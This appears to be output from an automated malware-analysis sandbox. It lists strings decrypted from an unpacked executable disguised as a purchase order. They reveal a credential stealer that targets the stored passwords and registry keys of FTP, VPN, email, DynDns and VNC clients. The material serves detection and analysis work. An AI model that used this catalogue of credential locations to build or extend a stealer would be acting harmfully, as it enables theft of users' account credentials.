                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \accountrc
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: smtp_server
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: address
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: account
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \passwordstorerc
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Flock Browser
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Flock\Browser\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: signons3.txt
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: DynDns
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ALLUSERSPROFILE
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Dyn\Updater\config.dyndns
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: username=
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: password=
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: https://account.dyn.com/
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: t6KzXhCh
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ALLUSERSPROFILE
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Dyn\Updater\daemon.cfg
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: global
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: accounts
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: account.
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: username
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: account.
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Psi/Psi+
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: name
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Psi/Psi+
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Psi\profiles
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Psi+\profiles
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \accounts.xml
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \accounts.xml
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: OpenVPN
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\OpenVPN-GUI\configs\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: username
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: auth-data
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: entropy
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: USERPROFILE
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \OpenVPN\config\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: remote
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: remote
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: NordVPN
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: NordVPN
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: NordVpn.exe*
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: user.config
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: //setting[@name='Username']/value
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: //setting[@name='Password']/value
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: NordVPN
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Private Internet Access
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: %ProgramW6432%
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Private Internet Access\data
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Private Internet Access\data
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \account.json
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: .*"username":"(.*?)"
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: .*"password":"(.*?)"
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Private Internet Access
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: privateinternetaccess.com
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: FileZilla
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Server>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Host>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Host>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </Host>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Port>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </Port>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <User>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <User>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </User>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Pass encoding="base64">
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Pass encoding="base64">
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </Pass>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Pass>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Pass encoding="base64">
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </Pass>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: CoreFTP
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: User
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Host
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Port
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: WinSCP
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: HostName
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: UserName
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: PublicKeyFile
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: PortNumber
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: WinSCP
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ABCDEF
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Flash FXP
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: port
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: user
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: pass
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: quick.dat
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Sites.dat
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \FlashFXP\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \FlashFXP\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: FTP Navigator
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SystemDrive
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \FTP Navigator\Ftplist.txt
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Server
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: No Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: User
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SmartFTP
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: WS_FTP
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: appdata
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: HOST
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: PWD=
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: PWD=
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: FtpCommander
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SystemDrive
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SystemDrive
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SystemDrive
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \cftp\Ftplist.txt
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ;Password=
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ;User=
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ;Server=
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ;Port=
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ;Port=
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ;Password=
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ;User=
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ;Anonymous=
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: FTPGetter
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \FTPGetter\servers.xml
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <server>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <server_ip>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <server_ip>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </server_ip>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <server_port>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </server_port>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <server_user_name>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <server_user_name>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </server_user_name>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <server_user_password>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <server_user_password>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </server_user_password>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: FTPGetter
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: The Bat!
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: appdata
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \The Bat!
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Account.CFN
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Account.CFN
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Becky!
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: DataDir
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Folder.lst
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Mailbox.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Account
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: PassWd
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Account
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SMTPServer
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Account
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: MailAddress
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Becky!
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Outlook
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Email
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: IMAP Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: POP3 Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: HTTP Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SMTP Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Email
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Email
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Email
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: IMAP Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: POP3 Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: HTTP Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SMTP Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Server
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Windows Mail App
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Email
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Server
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SchemaId
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: pResourceElement
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: pIdentityElement
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: pPackageSid
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: pAuthenticatorElement
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: syncpassword
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: mailoutgoing
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: FoxMail
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Executable
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: FoxmailPath
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Storage\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Storage\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \mail
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \mail
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Accounts\Account.rec0
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Accounts\Account.rec0
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Account.stg
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Account.stg
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: POP3Host
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SMTPHost
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: IncomingServer
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Account
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: MailAddress
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: POP3Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Opera Mail
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: opera:
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: PocoMail
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: appdata
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Pocomail\accounts.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Email
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: POPPass
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SMTPPass
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SMTP
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: eM Client
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: eM Client\accounts.dat
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: eM Client
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Accounts
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: "Username":"
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: "Secret":"
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: "ProviderName":"
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: o6806642kbM7c5
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Mailbird
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SenderIdentities
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Accounts
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Mailbird\Store\Store.db
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Server_Host
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Accounts
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Email
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Username
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: EncryptedPassword
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Mailbird
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: RealVNC 4.x
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: RealVNC 3.x
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: RealVNC 4.x
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: RealVNC 3.x
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\ORL\WinVNC3
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: TightVNC
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\TightVNC\Server
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: TightVNC
